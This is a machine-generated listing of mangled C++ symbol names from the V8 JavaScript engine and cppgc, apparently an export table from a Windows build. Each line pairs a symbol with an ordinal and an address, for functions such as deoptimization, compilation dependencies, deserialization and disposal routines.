                                                                                                                                                                                                        ?Deoptimize@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z50290x140eb28f0
                                                                                                                                                                                                        ?DeoptimizeAll@Deoptimizer@internal@v8@@SAXPEAVIsolate@23@@Z50300x140a51010
                                                                                                                                                                                                        ?DeoptimizeFunction@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z50310x140a5eab0
                                                                                                                                                                                                        ?DeoptimizeIf@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@W4IsSafetyCheck@234@@Z50320x140eb2a60
                                                                                                                                                                                                        ?DeoptimizeIf@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@3W4IsSafetyCheck@234@@Z50330x140f59d30
                                                                                                                                                                                                        ?DeoptimizeIf@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@2W4IsSafetyCheck@234@@Z50340x140f59dd0
                                                                                                                                                                                                        ?DeoptimizeIfNot@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@3W4IsSafetyCheck@234@@Z50350x140f59e80
                                                                                                                                                                                                        ?DeoptimizeIfNot@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@2W4IsSafetyCheck@234@@Z50360x140f59f20
                                                                                                                                                                                                        ?DeoptimizeReasonToString@internal@v8@@YAPEBDW4DeoptimizeReason@12@@Z50370x140a56810
                                                                                                                                                                                                        ?DeoptimizeUnless@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@W4IsSafetyCheck@234@@Z50380x140eb2ca0
                                                                                                                                                                                                        ?DependOnArrayBufferDetachingProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50390x140f33600
                                                                                                                                                                                                        ?DependOnArrayIteratorProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50400x140f33660
                                                                                                                                                                                                        ?DependOnArraySpeciesProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50410x140f336c0
                                                                                                                                                                                                        ?DependOnConsistentJSFunctionView@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSFunctionRef@234@@Z50420x140f33720
                                                                                                                                                                                                        ?DependOnConstantInDictionaryPrototypeChain@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@AEBVNameRef@234@AEBVObjectRef@234@W4PropertyKind@34@@Z50430x140f337d0
                                                                                                                                                                                                        ?DependOnElementsKind@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVAllocationSiteRef@234@@Z50440x140f338b0
                                                                                                                                                                                                        ?DependOnElementsKinds@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVAllocationSiteRef@234@@Z50450x140f339c0
                                                                                                                                                                                                        ?DependOnFieldConstness@CompilationDependencies@compiler@internal@v8@@QEAA?AW4PropertyConstness@34@AEBVMapRef@234@VInternalIndex@34@@Z50460x140f33b50
                                                                                                                                                                                                        ?DependOnGlobalProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVPropertyCellRef@234@@Z50470x140f33c80
                                                                                                                                                                                                        ?DependOnInitialMap@CompilationDependencies@compiler@internal@v8@@QEAA?AVMapRef@234@AEBVJSFunctionRef@234@@Z50480x140f33d60
                                                                                                                                                                                                        ?DependOnInitialMapInstanceSizePrediction@CompilationDependencies@compiler@internal@v8@@QEAA?AVSlackTrackingPrediction@234@AEBVJSFunctionRef@234@@Z50490x140f33e30
                                                                                                                                                                                                        ?DependOnNoElementsProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50500x140f33f60
                                                                                                                                                                                                        ?DependOnOwnConstantDataProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSObjectRef@234@AEBVMapRef@234@VRepresentation@34@VFieldIndex@34@AEBVObjectRef@234@@Z50510x140f33fc0
                                                                                                                                                                                                        ?DependOnOwnConstantDictionaryProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSObjectRef@234@VInternalIndex@34@AEBVObjectRef@234@@Z50520x140f340b0
                                                                                                                                                                                                        ?DependOnOwnConstantElement@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSObjectRef@234@IAEBVObjectRef@234@@Z50530x140f34190
                                                                                                                                                                                                        ?DependOnPretenureMode@CompilationDependencies@compiler@internal@v8@@QEAA?AW4AllocationType@34@AEBVAllocationSiteRef@234@@Z50540x140f34260
                                                                                                                                                                                                        ?DependOnPromiseHookProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50550x140f34340
                                                                                                                                                                                                        ?DependOnPromiseSpeciesProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50560x140f343a0
                                                                                                                                                                                                        ?DependOnPromiseThenProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ50570x140f34400
                                                                                                                                                                                                        ?DependOnProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NAEBVPropertyCellRef@234@@Z50580x140f34460
                                                                                                                                                                                                        ?DependOnPrototypeProperty@CompilationDependencies@compiler@internal@v8@@QEAA?AVObjectRef@234@AEBVJSFunctionRef@234@@Z50590x140f34550
                                                                                                                                                                                                        ?DependOnStableMap@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@@Z50600x140f34620
                                                                                                                                                                                                        ?DependOnStablePrototypeChains@CompilationDependencies@compiler@internal@v8@@QEAAXAEBV?$ZoneVector@VMapRef@compiler@internal@v8@@@34@W4WhereToStart@34@V?$Optional@VJSObjectRef@compiler@internal@v8@@@base@4@@Z50610x140f346e0
                                                                                                                                                                                                        ?Description@Symbol@v8@@QEBA?AV?$Local@VValue@v8@@@2@PEAVIsolate@2@@Z50620x140b10460
                                                                                                                                                                                                        ?Description@Symbol@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ50630x140b104d0
                                                                                                                                                                                                        ?Deserialize@ContextDeserializer@internal@v8@@AEAA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSGlobalProxy@internal@v8@@@23@UDeserializeInternalFieldsCallback@3@@Z50640x1406da610
                                                                                                                                                                                                        ?DeserializeArrays@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50650x1406acf10
                                                                                                                                                                                                        ?DeserializeClasses@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50660x1406ad2e0
                                                                                                                                                                                                        ?DeserializeContext@ContextDeserializer@internal@v8@@SA?AV?$MaybeHandle@VContext@internal@v8@@@23@PEAVIsolate@23@PEBVSnapshotData@23@_NV?$Handle@VJSGlobalProxy@internal@v8@@@23@UDeserializeInternalFieldsCallback@3@@Z50670x1406da740
                                                                                                                                                                                                        ?DeserializeContexts@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50680x1406ad990
                                                                                                                                                                                                        ?DeserializeDeferredObjects@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAAXXZ50690x1406d6ee0
                                                                                                                                                                                                        ?DeserializeDeferredObjects@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAAXXZ50700x1406d6f50
                                                                                                                                                                                                        ?DeserializeEmbedderFields@ContextDeserializer@internal@v8@@AEAAXUDeserializeInternalFieldsCallback@3@@Z50710x1406da900
                                                                                                                                                                                                        ?DeserializeExports@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50720x1406ae130
                                                                                                                                                                                                        ?DeserializeFunctions@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50730x1406ae3c0
                                                                                                                                                                                                        ?DeserializeMaps@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50740x1406ae950
                                                                                                                                                                                                        ?DeserializeNativeModule@wasm@internal@v8@@YA?AV?$MaybeHandle@VWasmModuleObject@internal@v8@@@23@PEAVIsolate@23@V?$Vector@$$CBE@base@3@1V?$Vector@$$CBD@73@@Z50750x1405286d0
                                                                                                                                                                                                        ?DeserializeObjects@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50760x1406aee20
                                                                                                                                                                                                        ?DeserializeReceiver@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z50770x140af4990
                                                                                                                                                                                                        ?DeserializeScopeChain@Parser@internal@v8@@QEAAXPEAVIsolate@23@PEAVParseInfo@23@V?$MaybeHandle@VScopeInfo@internal@v8@@@23@W4DeserializationMode@Scope@23@@Z50780x1407a5ef0
                                                                                                                                                                                                        ?DeserializeScopeChain@Scope@internal@v8@@SAPEAV123@PEAVIsolate@23@PEAVZone@23@VScopeInfo@23@PEAVDeclarationScope@23@PEAVAstValueFactory@23@W4DeserializationMode@123@@Z50790x140af4a10
                                                                                                                                                                                                        ?DeserializeStrings@WebSnapshotDeserializer@internal@v8@@AEAAXXZ50800x1406af3e0
                                                                                                                                                                                                        ?Destroy@BasePage@internal@cppgc@@SAXPEAV123@@Z50810x140464820
                                                                                                                                                                                                        ?Destroy@GlobalHandles@internal@v8@@SAXPEA_K@Z50820x1409f5fa0
                                                                                                                                                                                                        ?Destroy@LargePage@internal@cppgc@@SAXPEAV123@@Z50830x1404648b0
                                                                                                                                                                                                        ?Destroy@NormalPage@internal@cppgc@@SAXPEAV123@@Z50840x1404648f0
                                                                                                                                                                                                        ?DestroyTraced@GlobalHandles@internal@v8@@SAXPEA_K@Z50850x1409f5fb0
                                                                                                                                                                                                        ?DesugarBindingInForEachStatement@Parser@internal@v8@@AEAAXPEAUForInfo@?$ParserBase@VParser@internal@v8@@@23@PEAPEAVBlock@23@PEAPEAVExpression@23@@Z50860x1407a5fb0
                                                                                                                                                                                                        ?DesugarLexicalBindingsInForStatement@Parser@internal@v8@@AEAAPEAVStatement@23@PEAVForStatement@23@PEAV423@PEAVExpression@23@11PEAVScope@23@AEBUForInfo@?$ParserBase@VParser@internal@v8@@@23@@Z50870x1407a61b0
                                                                                                                                                                                                        ?Detach@ArrayBuffer@v8@@QEAAXXZ50880x140b10520
                                                                                                                                                                                                        ?Detach@JSArrayBuffer@internal@v8@@QEAAX_N@Z50890x14086bce0
                                                                                                                                                                                                        ?Detach@PersistentHandlesScope@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ50900x1409f3e40
                                                                                                                                                                                                        ?DetachAt@LiveRange@compiler@internal@v8@@QEAAPEAVUsePosition@234@VLifetimePosition@234@PEAV1234@PEAVZone@34@W4HintConnectionOption@1234@@Z50910x140f853c0
                                                                                                                                                                                                        ?DetachCanonicalHandles@CanonicalHandleScope@internal@v8@@AEAA?AV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@XZ50920x1409f4730
                                                                                                                                                                                                        ?DetachCanonicalHandles@JSHeapBroker@compiler@internal@v8@@AEAA?AV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@XZ50930x1404fe540
                                                                                                                                                                                                        ?DetachCanonicalHandles@OptimizedCompilationInfo@internal@v8@@QEAA?AV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@XZ50940x1404fe520
                                                                                                                                                                                                        ?DetachCppHeap@Heap@internal@v8@@QEAAXXZ50950x1409b4290
                                                                                                                                                                                                        ?DetachCppHeap@Isolate@v8@@QEAAXXZ50960x140b10610
                                                                                                                                                                                                        ?DetachFromSharedIsolate@Isolate@internal@v8@@QEAAXXZ50970x140a0f800
                                                                                                                                                                                                        ?DetachGlobal@Context@v8@@QEAAXXZ50980x140b10620
                                                                                                                                                                                                        ?DetachIsolate@CppHeap@internal@v8@@QEAAXXZ50990x1409e9b80
                                                                                                                                                                                                        ?DetachLocalIsolate@JSHeapBroker@compiler@internal@v8@@QEAAXPEAVOptimizedCompilationInfo@34@@Z51000x140f2e7a0
                                                                                                                                                                                                        ?DetachPersistentHandles@JSHeapBroker@compiler@internal@v8@@AEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ51010x140e84c30
                                                                                                                                                                                                        ?DetachPersistentHandles@LocalHeap@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ51020x1409a3600
                                                                                                                                                                                                        ?DetachPersistentHandles@OptimizedCompilationInfo@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ51030x1404fe540
                                                                                                                                                                                                        ?DetailsAt@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z51040x140483230
                                                                                                                                                                                                        ?DetailsAt@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z51050x140483260
                                                                                                                                                                                                        ?DetailsAt@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z51060x1407f6790
                                                                                                                                                                                                        ?DetailsAt@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z51070x1407f67b0
                                                                                                                                                                                                        ?DetailsAt@OrderedNameDictionary@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z51080x140483290
                                                                                                                                                                                                        ?DetailsAt@OrderedNameDictionaryHandler@internal@v8@@SA?AVPropertyDetails@23@VHeapObject@23@VInternalIndex@23@@Z51090x1407e49c0
                                                                                                                                                                                                        ?DetailsAt@SwissNameDictionary@internal@v8@@AEAA?AVPropertyDetails@23@H@Z51100x1404832c0
                                                                                                                                                                                                        ?DetailsAt@SwissNameDictionary@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z51110x1404832e0
                                                                                                                                                                                                        ?DetailsAtPut@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z51120x140483300
                                                                                                                                                                                                        ?DetailsAtPut@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z51130x140483380
                                                                                                                                                                                                        ?DetailsAtPut@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z51140x1407f67d0
                                                                                                                                                                                                        ?DetailsAtPut@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z51150x1407f6800
                                                                                                                                                                                                        ?DetailsAtPut@OrderedNameDictionary@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z51160x1404833b0
                                                                                                                                                                                                        ?DetailsAtPut@OrderedNameDictionaryHandler@internal@v8@@SAXVHeapObject@23@VInternalIndex@23@VPropertyDetails@23@@Z51170x1407e4a20
                                                                                                                                                                                                        ?DetailsAtPut@SwissNameDictionary@internal@v8@@AEAAXHVPropertyDetails@23@@Z51180x1404833f0
                                                                                                                                                                                                        ?DetailsAtPut@SwissNameDictionary@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z51190x140483410
                                                                                                                                                                                                        ?DetectableCallable@Type@compiler@internal@v8@@SA?AV1234@XZ51200x1404bb8a0
                                                                                                                                                                                                        ?DetectableObject@Type@compiler@internal@v8@@SA?AV1234@XZ51210x1404bb8b0
                                                                                                                                                                                                        ?DetectableReceiver@Type@compiler@internal@v8@@SA?AV1234@XZ51220x1404bb8c0
                                                                                                                                                                                                        ?DetectableReceiverOrNull@Type@compiler@internal@v8@@SA?AV1234@XZ51230x1404bb8d0
                                                                                                                                                                                                        ?DetermineParticipation@ControlEquivalence@compiler@internal@v8@@AEAAXPEAVNode@234@@Z51240x14109f5e0
                                                                                                                                                                                                        ?DetermineParticipationEnqueue@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneQueue@PEAVNode@compiler@internal@v8@@@34@PEAVNode@234@@Z51250x14109f8e0
                                                                                                                                                                                                        ?DetermineStubCallMode@CodeGenerator@compiler@internal@v8@@AEBA?AW4StubCallMode@34@XZ51260x140ee76e0
                                                                                                                                                                                                        ?DidAllocateDoubleRegisters@Frame@compiler@internal@v8@@QEBA_NXZ51270x1404bb8e0
                                                                                                                                                                                                        ?DidFinishModuleAsyncEvaluation@Isolate@internal@v8@@QEAAXI@Z51280x140483430
                                                                                                                                                                                                        ?DijkstraMarkingBarrier@JSHeapConsistency@v8@@SAXAEBUParams@WriteBarrier@internal@cppgc@@AEAVHeapHandle@6@AEBVTracedReferenceBase@2@@Z51290x140952c20
                                                                                                                                                                                                        ?DijkstraMarkingBarrier@JSHeapConsistency@v8@@SAXAEBUParams@WriteBarrier@internal@cppgc@@AEAVHeapHandle@6@PEBX@Z51300x140952c30
                                                                                                                                                                                                        ?DijkstraMarkingBarrier@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX@Z51310x14044fab0
                                                                                                                                                                                                        ?DijkstraMarkingBarrierRange@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX_K2P6AXPEAVVisitor@3@1@Z@Z51320x14044fac0
                                                                                                                                                                                                        ?DijkstraMarkingBarrierRangeSlow@WriteBarrier@internal@cppgc@@CAXAEAVHeapHandle@3@PEBX_K2P6AXPEAVVisitor@3@1@Z@Z51330x14044fb50
                                                                                                                                                                                                        ?DijkstraMarkingBarrierSlow@JSHeapConsistency@v8@@CAXAEAVHeapHandle@cppgc@@AEBVTracedReferenceBase@2@@Z51340x1409e9c30
                                                                                                                                                                                                        ?DijkstraMarkingBarrierSlow@WriteBarrier@internal@cppgc@@CAXPEBX@Z51350x14044fbe0
                                                                                                                                                                                                        ?DijkstraMarkingBarrierSlowWithSentinelCheck@WriteBarrier@internal@cppgc@@CAXPEBX@Z51360x14044fcc0
                                                                                                                                                                                                        ?DirectorySeparator@OS@base@v8@@SADXZ51370x140e5fe10
                                                                                                                                                                                                        ?Disable@CodeEventHandler@v8@@QEAAXXZ51380x140b10760
                                                                                                                                                                                                        ?DisableCompilationForSourcelessUse@V8@v8@@SAXXZ51390x140b10770
                                                                                                                                                                                                        ?DisableEmbeddedBlobRefcounting@internal@v8@@YAXXZ51400x140a0f840
                                                                                                                                                                                                        ?DisableForTesting@HeapGrowing@internal@cppgc@@QEAAXXZ51410x140464f70
                                                                                                                                                                                                        ?DisableHeapGrowingForTesting@Heap@internal@cppgc@@QEAAXXZ51420x140462310
                                                                                                                                                                                                        ?DisableInlineAllocation@Heap@internal@v8@@QEAAXXZ51430x1409b42d0
                                                                                                                                                                                                        ?DisableInterrupts@StackGuard@internal@v8@@AEAAXXZ51440x140a008a0
                                                                                                                                                                                                        ?DisableIteration@IdentityMapBase@internal@v8@@IEAAXXZ51450x1406b45b0
                                                                                                                                                                                                        ?DisableLogging@CpuProfiler@internal@v8@@AEAAXXZ51460x1407616b0
                                                                                                                                                                                                        ?DisableMemorySavingsMode@Isolate@internal@v8@@QEAAXXZ51470x140483450
                                                                                                                                                                                                        ?DisableMemorySavingsMode@Isolate@v8@@QEAAXXZ51480x140483450
                                                                                                                                                                                                        ?DisableScriptAndEval@CompilationCache@internal@v8@@QEAAXXZ51490x140ab08a0
                                                                                                                                                                                                        ?DisableSignalStackDump@debug@base@v8@@YAXXZ51500x140e6aef0
                                                                                                                                                                                                        ?Disassemble@BytecodeArray@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z51510x1408bff50
                                                                                                                                                                                                        ?Disassemble@Code@internal@v8@@QEAAXPEBDAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@PEAVIsolate@23@_K@Z51520x1408c0f40
                                                                                                                                                                                                        ?Disassemble@Disassembler@disasm@@SAXPEAU_iobuf@@PEAE1W4UnimplementedOpcodeAction@12@@Z51530x1404b3f20
                                                                                                                                                                                                        ?Disassemble@WasmCode@wasm@internal@v8@@QEBAXPEBDAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@_K@Z51540x140569860
                                                                                                                                                                                                        ?DiscardAllBaselineCode@Debug@internal@v8@@QEAAXXZ51550x140a5eb90
                                                                                                                                                                                                        ?DiscardBaselineCode@Debug@internal@v8@@QEAAXVSharedFunctionInfo@23@@Z51560x140a5ed10
                                                                                                                                                                                                        ?DiscardCompiled@SharedFunctionInfo@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z51570x1407d7190
                                                                                                                                                                                                        ?DiscardPerThreadDataForThisThread@Isolate@internal@v8@@QEAAXXZ51580x140a0f8c0
                                                                                                                                                                                                        ?DiscardReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAAXW4OperandSize@234@@Z51590x1408f52b0
                                                                                                                                                                                                        ?DiscardSystemPages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z51600x140e68b00
                                                                                                                                                                                                        ?DiscardSystemPages@OS@base@v8@@CA_NPEAX_K@Z51610x140e5fe20
                                                                                                                                                                                                        ?DiscardSystemPages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z51620x140e63610
                                                                                                                                                                                                        ?DiscardThreadSpecificMetadata@Isolate@v8@@QEAAXXZ51630x140b10790
                                                                                                                                                                                                        ?DispatchCodeEvent@ProfilerListener@internal@v8@@AEAAXAEBVCodeEventsContainer@23@@Z51640x140745390
                                                                                                                                                                                                        ?Dispose@CpuProfiler@v8@@QEAAXXZ51650x140b107a0
                                                                                                                                                                                                        ?Dispose@ExternalStringResourceBase@String@v8@@MEAAXXZ51660x140078bc0
                                                                                                                                                                                                        ?Dispose@Isolate@v8@@QEAAXXZ51670x140b107d0
                                                                                                                                                                                                        ?Dispose@V8@v8@@SA_NXZ51680x140b10850
                                                                                                                                                                                                        ?DisposeGlobal@V8@v8@@CAXPEA_K@Z51690x140b10860
                                                                                                                                                                                                        ?DisposeTracedGlobal@V8@v8@@CAXPEA_K@Z51700x140b10870
                                                                                                                                                                                                        ?Divide@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z51710x140f3bea0
                                                                                                                                                                                                        ?DivideModuloIntBignum@Bignum@base@v8@@QEAAGAEBV123@@Z51720x140e70730
                                                                                                                                                                                                        ?DoBackgroundWork@LazyCompileDispatcher@internal@v8@@AEAAXXZ51730x140a7bb90
                                                                                                                                                                                                        ?DoIdleWork@LazyCompileDispatcher@internal@v8@@AEAAXN@Z51740x140a7c050
                                                                                                                                                                                                        ?DoIntegerToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51750x14106dbe0
                                                                                                                                                                                                        ?DoIntegral32ToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51760x14106ddd0
                                                                                                                                                                                                        ?DoJSToNumberOrNumericTruncatesToFloat64@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRepresentationSelector@234@@Z51770x14106df10
                                                                                                                                                                                                        ?DoJSToNumberOrNumericTruncatesToWord32@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRepresentationSelector@234@@Z51780x14106e6d0
                                                                                                                                                                                                        ?DoLdar@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@@Z51790x1408f7f30
                                                                                                                                                                                                        ?DoMax@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEBVOperator@234@W4MachineRepresentation@34@@Z51800x14106ee60
                                                                                                                                                                                                        ?DoMin@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEBVOperator@234@W4MachineRepresentation@34@@Z51810x14106efb0
                                                                                                                                                                                                        ?DoMov@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@0@Z51820x1408f7f50
                                                                                                                                                                                                        ?DoNumberToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51830x14106f080
                                                                                                                                                                                                        ?DoNumberToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51840x14106f1c0
                                                                                                                                                                                                        ?DoOrderedNumberToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51850x14106f3d0
                                                                                                                                                                                                        ?DoParseFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@PEAVParseInfo@23@HHHPEBVAstRawString@23@@Z51860x1407a7360
                                                                                                                                                                                                        ?DoParseMemberExpressionContinuation@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEAVExpression@23@PEAV423@@Z51870x140774ba0
                                                                                                                                                                                                        ?DoParseProgram@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@PEAVParseInfo@23@@Z51880x1407a7dc0
                                                                                                                                                                                                        ?DoPromiseChecks@JSCallReducer@compiler@internal@v8@@AEAA_NPEAVMapInference@234@@Z51890x140fdc0e0
                                                                                                                                                                                                        ?DoSample@Sampler@sampler@v8@@QEAAXXZ51900x1408dff30
                                                                                                                                                                                                        ?DoSigned32ToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51910x14106f520
                                                                                                                                                                                                        ?DoStar@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@@Z51920x1408f7f80
                                                                                                                                                                                                        ?DoUnsigned32ToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z51930x14106f700
                                                                                                                                                                                                        ?Done@BreakIterator@internal@v8@@QEBA_NXZ51940x140483460
                                                                                                                                                                                                        ?Done@EhFrameIterator@internal@v8@@QEBA_NXZ51950x1400bc070
                                                                                                                                                                                                        ?DotPrintForTesting@RegExp@internal@v8@@SAXPEBDPEAVRegExpNode@23@@Z51960x1407183e0
                                                                                                                                                                                                        ?Double@AsmType@wasm@internal@v8@@SAPEAV1234@XZ51970x1406327c0
                                                                                                                                                                                                        ?DoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ51980x1406327d0
                                                                                                                                                                                                        ?DoubleToAscii@base@v8@@YAXNW4DtoaMode@12@HV?$Vector@D@12@PEAH22@Z51990x140e69ed0
                                                                                                                                                                                                        ?DoubleToCString@internal@v8@@YAPEBDNV?$Vector@D@base@2@@Z52000x1408cf1e0
                                                                                                                                                                                                        ?DoubleValue@Scanner@internal@v8@@QEAANXZ52010x140764e10
                                                                                                                                                                                                        ?Drop@MacroAssembler@internal@v8@@QEAAXH@Z52020x140503b40
                                                                                                                                                                                                        ?Drop@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ52030x1404acb60
                                                                                                                                                                                                        ?DropArguments@TurboAssembler@internal@v8@@IEAAXVRegister@23@W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z52040x140503b80
                                                                                                                                                                                                        ?DropArguments@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z52050x140503ce0
                                                                                                                                                                                                        ?DropArgumentsAndPushNewReceiver@TurboAssembler@internal@v8@@QEAAXVRegister@23@00W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z52060x140503d40
                                                                                                                                                                                                        ?DropArgumentsAndPushNewReceiver@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@0W4ArgumentsCountType@123@W4ArgumentsCountMode@123@@Z52070x140503db0
                                                                                                                                                                                                        ?DropOldData@StringTable@internal@v8@@QEAAXXZ52080x1407ca6b0
                                                                                                                                                                                                        ?DropUnderReturnAddress@MacroAssembler@internal@v8@@QEAAXHVRegister@23@@Z52090x140503e30
                                                                                                                                                                                                        ?DumpAndResetStats@Isolate@internal@v8@@QEAAXXZ52100x140a10250
                                                                                                                                                                                                        ?DumpAndResetStats@Isolate@v8@@QEAAXXZ52110x140b10980
                                                                                                                                                                                                        ?DumpAndResetTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAXXZ52120x1405562c0
                                                                                                                                                                                                        ?DumpAsyncTaskStacksStateForTest@v8_inspector@@YAXPEAVV8Inspector@1@@Z52130x14069b6f0
